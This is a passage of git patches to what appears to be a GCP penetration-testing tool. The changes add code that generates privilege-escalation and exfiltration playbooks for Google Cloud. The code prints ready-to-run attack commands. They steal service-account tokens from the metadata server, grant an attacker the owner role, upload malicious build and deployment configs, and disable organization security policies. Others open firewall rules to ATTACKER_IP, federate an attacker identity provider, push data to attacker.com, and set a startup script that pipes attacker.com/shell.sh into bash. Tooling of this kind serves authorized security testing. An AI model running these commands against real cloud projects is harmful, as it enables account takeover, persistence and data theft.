requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") + sections.WriteString(" headers={'Metadata-Flavor': 'Google'})\n") + sections.WriteString(" return r.json()\n") + sections.WriteString("EOF\n") + sections.WriteString("echo 'functions-framework\\nrequests' > requirements.txt\n\n") + sections.WriteString("# Deploy with target SA\n") + sections.WriteString("gcloud functions deploy token-stealer --gen2 --runtime=python311 \\\n") + sections.WriteString(" --trigger-http --allow-unauthenticated \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Cloud Run:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Deploy Cloud Run service with target SA\n") + sections.WriteString("gcloud run deploy token-stealer --image=gcr.io/PROJECT/stealer \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --allow-unauthenticated\n") + sections.WriteString("```\n\n") + } + + // Data Processing + if len(categories["Data Processing"]) > 0 { + sections.WriteString("## Data Processing Service Exploitation\n\n") + sections.WriteString("Principals with data processing permissions can submit jobs that run as privileged service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Data Processing"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Dataproc:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create Dataproc cluster with privileged SA\n") + sections.WriteString("gcloud dataproc clusters create pwned \\\n") + sections.WriteString(" --region=us-central1 \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Submit job to steal token\n") + sections.WriteString("gcloud dataproc jobs submit pyspark token_stealer.py \\\n") + sections.WriteString(" --cluster=pwned --region=us-central1\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Dataflow:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create Dataflow job with privileged SA\n") + sections.WriteString("gcloud dataflow jobs run pwned \\\n") + sections.WriteString(" --gcs-location=gs://dataflow-templates/latest/Word_Count \\\n") + sections.WriteString(" --service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // CI/CD + if len(categories["CI/CD"]) > 0 { + sections.WriteString("## CI/CD Service Exploitation\n\n") + sections.WriteString("Principals with CI/CD permissions can run builds with the Cloud Build service account.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["CI/CD"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create malicious cloudbuild.yaml\n") + sections.WriteString("cat > cloudbuild.yaml << 'EOF'\n") + sections.WriteString("steps:\n") + sections.WriteString("- name: 'gcr.io/cloud-builders/gcloud'\n") + sections.WriteString(" entrypoint: 'bash'\n") + sections.WriteString(" args:\n") + sections.WriteString(" - '-c'\n") + sections.WriteString(" - |\n") + sections.WriteString(" # Cloud Build SA has project Editor by default!\n") + sections.WriteString(" gcloud projects add-iam-policy-binding $PROJECT_ID \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/owner'\n") + sections.WriteString("EOF\n\n") + sections.WriteString("# Submit build\n") + sections.WriteString("gcloud builds submit --config=cloudbuild.yaml .\n") + sections.WriteString("```\n\n") + } + + // GKE + if len(categories["GKE"]) > 0 { + sections.WriteString("## GKE Cluster Exploitation\n\n") + sections.WriteString("Principals with GKE permissions can access clusters, exec into pods, or read secrets.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["GKE"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Get cluster credentials\n") + sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE\n\n") + sections.WriteString("# Exec into a pod\n") + sections.WriteString("kubectl exec -it POD_NAME -- /bin/sh\n\n") + sections.WriteString("# Read secrets\n") + sections.WriteString("kubectl get secrets -A -o yaml\n\n") + sections.WriteString("# Steal node SA token (if Workload Identity not enabled)\n") + sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\n") + sections.WriteString("```\n\n") + } + + // Secrets + if len(categories["Secrets"]) > 0 { + sections.WriteString("## Secret Access\n\n") + sections.WriteString("Principals with secret access can retrieve sensitive credentials.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Secrets"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# List all secrets\n") + sections.WriteString("gcloud secrets list --project=PROJECT_ID\n\n") + sections.WriteString("# Access secret value\n") + sections.WriteString("gcloud secrets versions access latest --secret=SECRET_NAME --project=PROJECT_ID\n\n") + sections.WriteString("# Grant yourself secret access if you have setIamPolicy\n") + sections.WriteString("gcloud secrets add-iam-policy-binding SECRET_NAME \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/secretmanager.secretAccessor'\n") + sections.WriteString("```\n\n") + } + + // Orchestration + if len(categories["Orchestration"]) > 0 { + sections.WriteString("## Orchestration Service Exploitation\n\n") + sections.WriteString("Principals with orchestration permissions can create environments that run as privileged SAs.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Orchestration"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Cloud Composer:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Composer environments run Airflow with a highly privileged SA\n") + sections.WriteString("# Create environment with target SA\n") + sections.WriteString("gcloud composer environments create pwned \\\n") + sections.WriteString(" --location=us-central1 \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Upload malicious DAG to steal credentials\n") + sections.WriteString("gcloud composer environments storage dags import \\\n") + sections.WriteString(" --environment=pwned --location=us-central1 \\\n") + sections.WriteString(" --source=malicious_dag.py\n") + sections.WriteString("```\n\n") + } + + return sections.String() } func (m *PrivescModule) addPathToLoot(path attackpathservice.AttackPath) { diff --git a/globals/gcp.go b/globals/gcp.go index 4fb8de95..6d2def9a 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -45,6 +45,7 @@ const GCP_BEYONDCORP_MODULE_NAME string = "beyondcorp" const GCP_ACCESSLEVELS_MODULE_NAME string = "access-levels" // Pentest modules +const GCP_HIDDEN_ADMINS_MODULE_NAME string = "hidden-admins" const GCP_KEYS_MODULE_NAME string = "keys" const GCP_HMACKEYS_MODULE_NAME string = "hmac-keys" const GCP_PRIVESC_MODULE_NAME string = "privesc" From 59bac4ee36d355637816a59e5a6c647d7cd9415f Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 30 Jan 2026 09:22:38 -0500 Subject: [PATCH 32/48] fixed whoami output and added new attack paths --- gcp/commands/privesc.go | 185 +++++++- gcp/commands/whoami.go | 160 ++++++- .../attackpathService/attackpathService.go | 408 ++++++++++++++---- 3 files changed, 660 insertions(+), 93 deletions(-) diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 857c49d0..60960d7c 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -205,14 +205,17 @@ func (m *PrivescModule) generatePlaybookSections() string { "Compute": {}, "Serverless": {}, "Data Processing": {}, + "AI/ML": {}, "Orchestration": {}, "CI/CD": {}, + "IaC": {}, "GKE": {}, "Secrets": {}, - "Deployment": {}, "Federation": {}, "Org Policy": {}, + "Network Access": {}, "SA Usage": {}, + "Billing": {}, } for _, path := range m.AllPaths { @@ -474,6 +477,186 @@ func (m *PrivescModule) generatePlaybookSections() string { sections.WriteString(" --environment=pwned --location=us-central1 \\\n") sections.WriteString(" --source=malicious_dag.py\n") sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Cloud Scheduler:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create scheduled job that runs with target SA (OIDC auth)\n") + sections.WriteString("gcloud scheduler jobs create http privesc-job \\\n") + sections.WriteString(" --schedule='* * * * *' \\\n") + sections.WriteString(" --uri='https://ATTACKER_CONTROLLED_ENDPOINT/receive' \\\n") + sections.WriteString(" --oidc-service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --location=us-central1\n\n") + sections.WriteString("# The endpoint receives requests with an OIDC token signed by the SA\n") + sections.WriteString("# Extract the token from the Authorization header\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Cloud Tasks:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create task queue\n") + sections.WriteString("gcloud tasks queues create privesc-queue --location=us-central1\n\n") + sections.WriteString("# Create HTTP task with OIDC token\n") + sections.WriteString("gcloud tasks create-http-task \\\n") + sections.WriteString(" --queue=privesc-queue \\\n") + sections.WriteString(" --url='https://ATTACKER_CONTROLLED_ENDPOINT/receive' \\\n") + sections.WriteString(" --oidc-service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --location=us-central1\n") + sections.WriteString("```\n\n") + } + + // AI/ML + if len(categories["AI/ML"]) > 0 { + sections.WriteString("## AI/ML Platform Exploitation\n\n") + sections.WriteString("Principals with AI/ML permissions can create notebooks or training jobs that run as privileged SAs.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["AI/ML"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Vertex AI Workbench:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create notebook instance with privileged SA\n") + sections.WriteString("gcloud notebooks instances create privesc-notebook \\\n") + sections.WriteString(" --location=us-central1-a \\\n") + sections.WriteString(" --machine-type=n1-standard-4 \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Access the notebook via JupyterLab UI or proxy\n") + sections.WriteString("gcloud notebooks instances describe privesc-notebook --location=us-central1-a\n\n") + sections.WriteString("# In the notebook, steal the SA token:\n") + sections.WriteString("# import requests\n") + sections.WriteString("# r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") + sections.WriteString("# headers={'Metadata-Flavor': 'Google'})\n") + sections.WriteString("# print(r.json()['access_token'])\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Vertex AI Custom Jobs:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create custom training job with privileged SA\n") + sections.WriteString("gcloud ai custom-jobs create \\\n") + sections.WriteString(" --region=us-central1 \\\n") + sections.WriteString(" --display-name=privesc-job \\\n") + sections.WriteString(" --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=gcr.io/PROJECT/token-stealer \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // IaC (Infrastructure as Code) + if len(categories["IaC"]) > 0 { + sections.WriteString("## Infrastructure as Code Exploitation\n\n") + sections.WriteString("Principals with IaC permissions can deploy infrastructure using the Deployment Manager service account.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["IaC"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Deployment Manager:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create deployment config that grants attacker Owner role\n") + sections.WriteString("cat > privesc-config.yaml << 'EOF'\n") + sections.WriteString("resources:\n") + sections.WriteString("- name: privesc-binding\n") + sections.WriteString(" type: gcp-types/cloudresourcemanager-v1:virtual.projects.iamMemberBinding\n") + sections.WriteString(" properties:\n") + sections.WriteString(" resource: PROJECT_ID\n") + sections.WriteString(" role: roles/owner\n") + sections.WriteString(" member: user:attacker@example.com\n") + sections.WriteString("EOF\n\n") + sections.WriteString("# Deploy - runs as [PROJECT_NUMBER]@cloudservices.gserviceaccount.com\n") + sections.WriteString("# This SA typically has Editor role on the project\n") + sections.WriteString("gcloud deployment-manager deployments create privesc-deploy \\\n") + sections.WriteString(" --config=privesc-config.yaml\n") + sections.WriteString("```\n\n") + } + + // Federation (Workload Identity) + if len(categories["Federation"]) > 0 { + sections.WriteString("## Workload Identity Federation Exploitation\n\n") + sections.WriteString("Principals with federation permissions can create identity pools that allow external identities to impersonate GCP service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Federation"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create workload identity pool\n") + sections.WriteString("gcloud iam workload-identity-pools create attacker-pool \\\n") + sections.WriteString(" --location=global \\\n") + sections.WriteString(" --display-name='Attacker Pool'\n\n") + sections.WriteString("# Create OIDC provider pointing to attacker-controlled IdP\n") + sections.WriteString("gcloud iam workload-identity-pools providers create-oidc attacker-provider \\\n") + sections.WriteString(" --location=global \\\n") + sections.WriteString(" --workload-identity-pool=attacker-pool \\\n") + sections.WriteString(" --issuer-uri='https://attacker-idp.example.com' \\\n") + sections.WriteString(" --attribute-mapping='google.subject=assertion.sub'\n\n") + sections.WriteString("# Grant the pool's identities ability to impersonate a SA\n") + sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") + sections.WriteString(" PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --role=roles/iam.workloadIdentityUser \\\n") + sections.WriteString(" --member='principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/attacker-pool/*'\n\n") + sections.WriteString("# Now authenticate from external system and get GCP token\n") + sections.WriteString("# This allows persistent access from outside GCP\n") + sections.WriteString("```\n\n") + } + + // Org Policy + if len(categories["Org Policy"]) > 0 { + sections.WriteString("## Organization Policy Exploitation\n\n") + sections.WriteString("Principals with org policy permissions can disable security constraints across the organization.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Org Policy"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Disable domain restricted sharing constraint\n") + sections.WriteString("cat > policy.yaml << 'EOF'\n") + sections.WriteString("constraint: constraints/iam.allowedPolicyMemberDomains\n") + sections.WriteString("listPolicy:\n") + sections.WriteString(" allValues: ALLOW\n") + sections.WriteString("EOF\n") + sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n\n") + sections.WriteString("# Disable service account key creation constraint\n") + sections.WriteString("cat > policy.yaml << 'EOF'\n") + sections.WriteString("constraint: constraints/iam.disableServiceAccountKeyCreation\n") + sections.WriteString("booleanPolicy:\n") + sections.WriteString(" enforced: false\n") + sections.WriteString("EOF\n") + sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n\n") + sections.WriteString("# Disable VM external IP constraint\n") + sections.WriteString("cat > policy.yaml << 'EOF'\n") + sections.WriteString("constraint: constraints/compute.vmExternalIpAccess\n") + sections.WriteString("listPolicy:\n") + sections.WriteString(" allValues: ALLOW\n") + sections.WriteString("EOF\n") + sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n") + sections.WriteString("```\n\n") + } + + // Network Access + if len(categories["Network Access"]) > 0 { + sections.WriteString("## Network Access Exploitation\n\n") + sections.WriteString("Principals with network access permissions can create tunnels or modify firewall rules to access internal resources.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Network Access"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - IAP Tunnel:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Start IAP tunnel to SSH port\n") + sections.WriteString("gcloud compute start-iap-tunnel INSTANCE_NAME 22 \\\n") + sections.WriteString(" --local-host-port=localhost:2222 \\\n") + sections.WriteString(" --zone=us-central1-a\n\n") + sections.WriteString("# SSH through the tunnel\n") + sections.WriteString("ssh -p 2222 user@localhost\n\n") + sections.WriteString("# Or use gcloud directly\n") + sections.WriteString("gcloud compute ssh INSTANCE_NAME --zone=us-central1-a --tunnel-through-iap\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Firewall Rules:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create firewall rule allowing attacker IP\n") + sections.WriteString("gcloud compute firewall-rules create allow-attacker \\\n") + sections.WriteString(" --network=default \\\n") + sections.WriteString(" --allow=tcp:22,tcp:3389,tcp:443 \\\n") + sections.WriteString(" --source-ranges=ATTACKER_IP/32 \\\n") + sections.WriteString(" --target-tags=all-instances\n\n") + sections.WriteString("# Modify existing rule to allow more access\n") + sections.WriteString("gcloud compute firewall-rules update RULE_NAME \\\n") + sections.WriteString(" --source-ranges=0.0.0.0/0\n") + sections.WriteString("```\n\n") } return sections.String() diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index 56849cb5..cf6486e7 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -1231,6 +1231,11 @@ func (m *WhoAmIModule) generateLoot() { if path.Confidence == "potential" { confidenceNote = "# NOTE: This is a POTENTIAL path based on role name. Actual exploitation depends on resource configuration.\n" } + // Use the stored command if available, otherwise generate one + exploitCmd := path.Command + if exploitCmd == "" { + exploitCmd = generatePrivescExploitCmd(path.Permission, path.ProjectID) + } m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( "## %s\n"+ "# %s\n"+ @@ -1246,7 +1251,7 @@ func (m *WhoAmIModule) generateLoot() { path.Confidence, path.RequiredPerms, confidenceNote, - path.Command, + exploitCmd, ) } @@ -1288,27 +1293,175 @@ func (m *WhoAmIModule) generateLoot() { } } +// generatePrivescExploitCmd generates an exploit command for a privilege escalation permission +func generatePrivescExploitCmd(permission, projectID string) string { + switch permission { + // Service Account Impersonation + case "iam.serviceAccounts.getAccessToken": + return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=SA_EMAIL@%s.iam.gserviceaccount.com", projectID) + case "iam.serviceAccounts.implicitDelegation": + return fmt.Sprintf("# Chain impersonation through intermediary SA\ngcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "iam.serviceAccounts.signBlob": + return fmt.Sprintf("gcloud iam service-accounts sign-blob --iam-account=SA_EMAIL@%s.iam.gserviceaccount.com input.txt output.sig", projectID) + case "iam.serviceAccounts.signJwt": + return fmt.Sprintf("gcloud iam service-accounts sign-jwt --iam-account=SA_EMAIL@%s.iam.gserviceaccount.com jwt.json signed_jwt.txt", projectID) + + // Service Account Key Creation + case "iam.serviceAccountKeys.create": + return fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL@%s.iam.gserviceaccount.com", projectID) + + // IAM Policy Modification + case "resourcemanager.projects.setIamPolicy": + return fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:attacker@example.com --role=roles/owner", projectID) + case "resourcemanager.folders.setIamPolicy": + return fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=user:attacker@example.com --role=roles/owner") + case "resourcemanager.organizations.setIamPolicy": + return "gcloud organizations add-iam-policy-binding ORG_ID --member=user:attacker@example.com --role=roles/owner" + case "iam.serviceAccounts.setIamPolicy": + return fmt.Sprintf("gcloud iam service-accounts add-iam-policy-binding SA_EMAIL@%s.iam.gserviceaccount.com --member=user:attacker@example.com --role=roles/iam.serviceAccountTokenCreator", projectID) + case "iam.roles.update": + return fmt.Sprintf("gcloud iam roles update ROLE_ID --project=%s --add-permissions=iam.serviceAccounts.getAccessToken", projectID) + + // Cloud Functions + case "cloudfunctions.functions.create": + return fmt.Sprintf("gcloud functions deploy privesc-func --runtime=python39 --trigger-http --service-account=TARGET_SA@%s.iam.gserviceaccount.com --entry-point=main --source=. --project=%s", projectID, projectID) + case "cloudfunctions.functions.update": + return fmt.Sprintf("gcloud functions deploy EXISTING_FUNC --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + case "cloudfunctions.functions.sourceCodeSet": + return fmt.Sprintf("gcloud functions deploy FUNC_NAME --source=gs://BUCKET/malicious-code.zip --project=%s", projectID) + + // Compute Engine + case "compute.instances.create": + return fmt.Sprintf("gcloud compute instances create privesc-vm --service-account=TARGET_SA@%s.iam.gserviceaccount.com --scopes=cloud-platform --project=%s", projectID, projectID) + case "compute.instances.setServiceAccount": + return fmt.Sprintf("gcloud compute instances set-service-account INSTANCE_NAME --service-account=TARGET_SA@%s.iam.gserviceaccount.com --zone=ZONE --project=%s", projectID, projectID) + case "compute.instances.setMetadata": + return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE_NAME --metadata=startup-script='curl http://attacker.com/shell.sh | bash' --zone=ZONE --project=%s", projectID) + + // Cloud Run + case "run.services.create": + return fmt.Sprintf("gcloud run deploy privesc-svc --image=IMAGE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + case "run.services.update": + return fmt.Sprintf("gcloud run services update SERVICE_NAME --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + + // Cloud Scheduler / Tasks + case "cloudscheduler.jobs.create": + return fmt.Sprintf("gcloud scheduler jobs create http privesc-job --schedule='* * * * *' --uri=https://TARGET --oidc-service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + case "cloudtasks.tasks.create": + return fmt.Sprintf("gcloud tasks create-http-task --queue=QUEUE --url=https://TARGET --oidc-service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + + // Kubernetes / GKE + case "container.clusters.getCredentials": + return fmt.Sprintf("gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE --project=%s", projectID) + + // Deployment Manager + case "deploymentmanager.deployments.create": + return fmt.Sprintf("gcloud deployment-manager deployments create privesc-deploy --config=config.yaml --project=%s", projectID) + + // Composer / Airflow + case "composer.environments.create": + return fmt.Sprintf("gcloud composer environments create privesc-env --location=REGION --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + + // Dataproc + case "dataproc.clusters.create": + return fmt.Sprintf("gcloud dataproc clusters create privesc-cluster --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=REGION --project=%s", projectID, projectID) + + // Dataflow + case "dataflow.jobs.create": + return fmt.Sprintf("gcloud dataflow jobs run privesc-job --gcs-location=gs://dataflow-templates --service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + + // API Keys + case "apikeys.keys.create": + return fmt.Sprintf("gcloud alpha services api-keys create --project=%s", projectID) + + // Storage (bucket-level) + case "storage.buckets.setIamPolicy": + return fmt.Sprintf("gsutil iam ch user:attacker@example.com:objectViewer gs://BUCKET_NAME") + + // Pub/Sub + case "pubsub.topics.setIamPolicy": + return fmt.Sprintf("gcloud pubsub topics add-iam-policy-binding TOPIC --member=user:attacker@example.com --role=roles/pubsub.publisher --project=%s", projectID) + case "pubsub.subscriptions.setIamPolicy": + return fmt.Sprintf("gcloud pubsub subscriptions add-iam-policy-binding SUBSCRIPTION --member=user:attacker@example.com --role=roles/pubsub.subscriber --project=%s", projectID) + + // Service Usage + case "serviceusage.services.enable": + return fmt.Sprintf("gcloud services enable iamcredentials.googleapis.com --project=%s", projectID) + + default: + return fmt.Sprintf("# Permission: %s - Refer to GCP documentation for exploitation", permission) + } +} + // generateExfilExploitCmd generates an exploit command for a data exfil permission func generateExfilExploitCmd(permission, projectID string) string { switch permission { + // Compute case "compute.images.create": return fmt.Sprintf("gcloud compute images create exfil-image --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s", projectID) case "compute.snapshots.create": return fmt.Sprintf("gcloud compute snapshots create exfil-snapshot --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s", projectID) + case "compute.disks.createSnapshot": + return fmt.Sprintf("gcloud compute disks snapshot DISK_NAME --snapshot-names=exfil-snapshot --zone=ZONE --project=%s", projectID) + + // Logging case "logging.sinks.create": return fmt.Sprintf("gcloud logging sinks create exfil-sink pubsub.googleapis.com/projects/EXTERNAL_PROJECT/topics/stolen-logs --project=%s", projectID) + case "logging.logEntries.list": + return fmt.Sprintf("gcloud logging read 'logName:projects/%s/logs/' --limit=1000 --project=%s", projectID, projectID) + + // Cloud SQL case "cloudsql.instances.export": return fmt.Sprintf("gcloud sql export sql INSTANCE_NAME gs://BUCKET/export.sql --database=DB_NAME --project=%s", projectID) + case "cloudsql.backupRuns.create": + return fmt.Sprintf("gcloud sql backups create --instance=INSTANCE_NAME --project=%s", projectID) + + // Pub/Sub case "pubsub.subscriptions.create": return fmt.Sprintf("gcloud pubsub subscriptions create exfil-sub --topic=TOPIC_NAME --push-endpoint=https://attacker.com/collect --project=%s", projectID) + case "pubsub.subscriptions.consume": + return fmt.Sprintf("gcloud pubsub subscriptions pull SUBSCRIPTION_NAME --limit=100 --project=%s", projectID) + + // BigQuery case "bigquery.tables.export": return fmt.Sprintf("bq extract --destination_format=CSV '%s:DATASET.TABLE' gs://BUCKET/export.csv", projectID) + case "bigquery.tables.getData": + return fmt.Sprintf("bq query --use_legacy_sql=false 'SELECT * FROM `%s.DATASET.TABLE` LIMIT 1000'", projectID) + case "bigquery.jobs.create": + return fmt.Sprintf("bq query --use_legacy_sql=false --destination_table=%s:DATASET.EXFIL_TABLE 'SELECT * FROM `%s.DATASET.SOURCE_TABLE`'", projectID, projectID) + + // Storage Transfer case "storagetransfer.jobs.create": return fmt.Sprintf("gcloud transfer jobs create gs://SOURCE_BUCKET s3://DEST_BUCKET --project=%s", projectID) + + // Secret Manager case "secretmanager.versions.access": return fmt.Sprintf("gcloud secrets versions access latest --secret=SECRET_NAME --project=%s", projectID) + case "secretmanager.secrets.list": + return fmt.Sprintf("gcloud secrets list --project=%s", projectID) + + // Cloud Storage case "storage.objects.get": return fmt.Sprintf("gsutil cp gs://BUCKET/OBJECT ./local-file --project=%s", projectID) + case "storage.objects.list": + return fmt.Sprintf("gsutil ls -r gs://BUCKET_NAME --project=%s", projectID) + case "storage.buckets.list": + return fmt.Sprintf("gsutil ls --project=%s", projectID) + + // Firestore / Datastore + case "datastore.entities.list": + return fmt.Sprintf("gcloud datastore export gs://BUCKET --project=%s", projectID) + case "firestore.documents.list": + return fmt.Sprintf("gcloud firestore export gs://BUCKET --project=%s", projectID) + + // Spanner + case "spanner.databases.read": + return fmt.Sprintf("gcloud spanner databases execute-sql DATABASE --instance=INSTANCE --sql='SELECT * FROM TABLE' --project=%s", projectID) + + // KMS (for decrypting encrypted data) + case "cloudkms.cryptoKeyVersions.useToDecrypt": + return fmt.Sprintf("gcloud kms decrypt --location=LOCATION --keyring=KEYRING --key=KEY --ciphertext-file=encrypted.txt --plaintext-file=decrypted.txt --project=%s", projectID) + default: return fmt.Sprintf("# Permission: %s - Refer to GCP documentation", permission) } @@ -1622,8 +1775,9 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { func (m *WhoAmIModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { - // Include loot files that have content and aren't just header comments - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + // Include loot files that have content beyond the header comments + // Headers end with "# WARNING: Only use with proper authorization!\n\n" + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization!\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/services/attackpathService/attackpathService.go b/gcp/services/attackpathService/attackpathService.go index cb73d958..bc28e14b 100644 --- a/gcp/services/attackpathService/attackpathService.go +++ b/gcp/services/attackpathService/attackpathService.go @@ -241,88 +241,188 @@ func GetLateralMovementPermissions() []LateralMovementPermission { } // GetPrivescPermissions returns permissions that enable privilege escalation +// Based on research from DataDog pathfinding.cloud AWS paths, mapped to GCP equivalents func GetPrivescPermissions() []PrivescPermission { return []PrivescPermission{ - // Service Account Impersonation - CRITICAL - {Permission: "iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate access tokens for any SA"}, - {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign blobs as SA (GCS signed URLs)"}, - {Permission: "iam.serviceAccounts.signJwt", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign JWTs as SA (impersonation)"}, - {Permission: "iam.serviceAccounts.implicitDelegation", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Delegate SA identity to others"}, - {Permission: "iam.serviceAccounts.getOpenIdToken", Category: "SA Impersonation", RiskLevel: "HIGH", Description: "Generate OIDC tokens for SA"}, - - // Key Creation - CRITICAL - {Permission: "iam.serviceAccountKeys.create", Category: "Key Creation", RiskLevel: "CRITICAL", Description: "Create persistent SA keys"}, + // ========================================== + // SERVICE ACCOUNT IMPERSONATION - CRITICAL + // AWS equivalent: sts:AssumeRole + // ========================================== + {Permission: 